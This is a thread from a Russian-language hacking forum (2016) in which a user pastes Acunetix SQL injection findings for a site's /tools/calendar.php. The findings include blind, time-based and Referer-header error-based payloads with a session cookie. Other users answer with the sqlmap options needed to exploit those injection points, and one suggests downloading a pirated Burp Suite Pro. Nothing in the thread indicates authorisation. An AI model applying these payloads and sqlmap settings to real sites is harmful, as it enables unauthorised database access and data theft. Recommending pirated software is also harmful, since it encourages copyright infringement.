HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.02.2016, 15:08
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

А есть альтернатива акунетиксу?более мощный инструмент?
 
Ответить с цитированием

  #12  
Старый 21.02.2016, 16:33
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

В мапе пишет

[ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) byusing higher verbosity levels

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

URL encoded GET input order was set to 1,(select case when (3*2*1=6 AND 000513=000513) then 1 else 1*(select table_name from information_schema.tables)end)=1

This vulnerability affects /tools/calendar.php.

Discovered by: Scripting (Blind_Sql_Injection.script).

Attack details

URL encoded GET input date was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/


Подскажите как раскрутить мапом
 
Ответить с цитированием

  #13  
Старый 21.02.2016, 17:04
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

А есть альтернатива акунетиксу?более мощный инструмент?
Мне в соседней теме owasp zap посоветовали.
 
Ответить с цитированием

  #14  
Старый 27.02.2016, 12:25
nikbim96
Guest
Сообщений: n/a
Провел на форуме:
28758

Репутация: 1
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

А есть альтернатива акунетиксу?более мощный инструмент?
альтернатив полно, самые крутые штуки которыми я пользовался в kali linux это были - OWASP OWTF и OWASP Zed Attack

Можно использовать ещё Nessus интегрируя его с Metasploit кстати в Metasploit тоже полно модулей для тестирования. Ну и конечно же можно использовать мой любимый

OpenVAS желательно новую версия.. А если ты хочешь получить 100% результат и быть гуру в веб хакинге юзай как все нормальские пен-тестеры

Burp Suite только желательно найди pro в сети вроде на каком то торентрекере видел.
 
Ответить с цитированием

  #15  
Старый 11.03.2016, 21:06
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Referer: 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(113),CHAR( 104),CHAR(115),CHAR(68),CHAR(121),CHAR(72),CHAR(69 ),CHAR(108)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Cookie: PHPSESSID=jhhavo515jluqct43if2tj7fp3

как sqlmap"om раскрутить такую скулю?
 
Ответить с цитированием

  #16  
Старый 11.03.2016, 21:07
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

--referer="1*"
 
Ответить с цитированием

  #17  
Старый 15.03.2016, 22:02
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)

AppleWebKit/537.21 (KHTML, like Gecko)

Chrome/41.0.2228.0 Safari/537.21

X-Forwarded-For: 1' а как быть с этим?
 
Ответить с цитированием

  #18  
Старый 15.03.2016, 22:14
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: 1' а как быть с этим?
гуглить вообще пробовали?

--header="X-Forwarded-For: 1*"
 
Ответить с цитированием

  #19  
Старый 15.03.2016, 22:31
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: 1' а как быть с этим?
https://github.com/sqlmapproject/sqlmap/wiki/Usage
 
Ответить с цитированием

  #20  
Старый 16.03.2016, 17:15
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Настоятельно рекомендую запомнить Опцию

--wizard- Это опция помощник , sqlmap будет задавать тебе вопросы и на основании твоих ответов будет делать то ли и иное действие. тебе остаётся лишь жать кнопку , одну из двух
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ